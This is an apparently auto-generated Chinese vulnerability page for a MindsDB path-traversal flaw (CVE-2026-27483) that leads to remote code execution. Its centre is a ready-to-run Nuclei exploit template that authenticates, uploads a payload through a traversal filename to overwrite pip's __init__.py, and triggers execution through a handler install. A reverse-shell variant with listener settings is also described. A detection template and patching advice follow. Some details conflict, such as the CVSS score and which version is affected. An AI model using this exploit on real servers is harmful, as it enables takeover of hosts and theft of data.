[webapps] MindsDB 25.9.1.1 - Path Traversal
CVE-2026-27483
MindsDB API文件上传路径遍历导致远程代码执行
Critical · CVSS 估计9.8📋 漏洞基础信息
| CVE | CVE-2026-27483 |
|---|---|
| 漏洞类型 | 路径遍历RCE |
| 受影响版本 | MindsDB < 25.9.1.1 |
| 危害等级 | Critical · CVSS 估计9.8 |
| 发布日期 | 2026-05-04 |
| 提交者 | Lohitya Pushkar (thewhiteh4t) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
/api/files/{fname}端点未对上传文件路径进行有效限制,导致攻击者可通过路径遍历字符串(如../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py)覆盖任意文件,结合后续handler安装触发恶意代码执行。
🎯 攻击场景
1. 检查目标MindsDB版本和认证状态;2. 若认证启用则先通过/api/login获取Bearer token;3. 构造一个Python反弹shell载荷(文件名随机);4. 使用PUT /api/files/{fname}接口并设置file参数为路径遍历字符串指向pip/__init__.py;5. 发送POST请求到/api/handlers/anomaly_detection/install触发安装流程,导致被覆盖的pip模块被加载执行恶意代码。
💥 漏洞影响
未经授权的攻击者可在目标服务器上执行任意Python代码,进而控制主机、窃取数据、横向移动等。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-27483-exploit
info:
name: MindsDB 25.9.1.1 - Path Traversal to RCE Exploit
author: thewhiteh4t
severity: high
description: |
MindsDB version 25.9.1.1 is vulnerable to path traversal.
This exploit allows an attacker to execute arbitrary code via file upload to a path traversable location.
reference:
- https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
classification:
cvss-score: 7.5
cve-id: CVE-2026-27483
tags: cve,cve2026,mindsdb,path-traversal,rce
variables:
cmd: id
listener_host: 127.0.0.1
listener_port: 4444
http:
- raw:
- |
GET /api/status HTTP/1.1
Host: {{Hostname}}
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"mindsdb_version":'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"mindsdb_version":\s*"([^"]+)"'
internal: true
name: version
- type: regex
part: body
group: 1
regex:
- '"auth":\s*\{\s*"http_auth_enabled":\s*(true|false)'
internal: true
name: auth_enabled
- raw:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 60
Connection: close
{"username":"{{username}}","password":"{{password}}"}
matchers:
- type: word
part: body
words:
- '"token"'
extractors:
- type: regex
part: body
group: 1
regex:
- '"token":\s*"([^"]+)"'
name: token
stop-at-first-match: true
req-condition: true
- raw:
- |
PUT /api/files/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
Authorization: Bearer {{token}}
Content-Length: 300
Connection: close
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="name"
{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="source"
{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="source_type"
file
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="file"; filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
Content-Type: text/plain
{{cmd}}
------WebKitFormBoundary{{randstr}}--
matchers:
- type: word
part: body
words:
- '""'
negative: true
- type: status
status:
- 200
- 201
- 204
matchers-condition: or
- raw:
- |
POST /api/handlers/anomaly_detection/install HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Bearer {{token}}
Content-Length: 2
Connection: close
{}
matchers:
- type: word
part: body
words:
- 'success'
- type: status
status:
- 200
- 201🔬 深度技术分析
1. 解析目标地址、监听地址和认证参数;2. 通过/api/status获取版本和认证状态,检查是否为受影响版本(>=25.4.1.0且<25.9.1.1);3. 若认证开启则调用login()获取JWT token;4. 构造反弹shell字符串并将换行符替换为\r\n;5. 生成8位随机小写字母作为文件名;6. 构造payload字典(name、source、source_type)和files字典(key为路径遍历字符串,value为shell代码);7. 发送PUT请求上传文件;8. 发送POST请求安装异常检测handler,触发文件包含导致RCE。
🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-27483-detection
info:
name: MindsDB 25.9.1.1 - Path Traversal Detection
author: thewhiteh4t
severity: high
description: |
MindsDB version 25.9.1.1 is vulnerable to path traversal.
This detection check verifies if the target is running a vulnerable version.
reference:
- https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
classification:
cvss-score: 7.5
cve-id: CVE-2026-27483
tags: cve,cve2026,mindsdb,path-traversal,detection
http:
- method: GET
path:
- '{{BaseURL}}/api/status'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"mindsdb_version":'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"mindsdb_version":\s*"([^"]+)"'
internal: true
name: version
- type: regex
part: body
group: 1
regex:
- '"mindsdb_version":\s*"([^"]+)"'
name: mindsdb_version🛡️ 修复建议
升级到MindsDB 25.9.1.1或更高版本(已修复);临时措施:限制对/api/files/*和/api/handlers/*的访问、启用认证并仅允许可信用户、使用Web应用防火墙拦截路径遍历字符序列。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-09 17:17 | 来源: Exploit-DB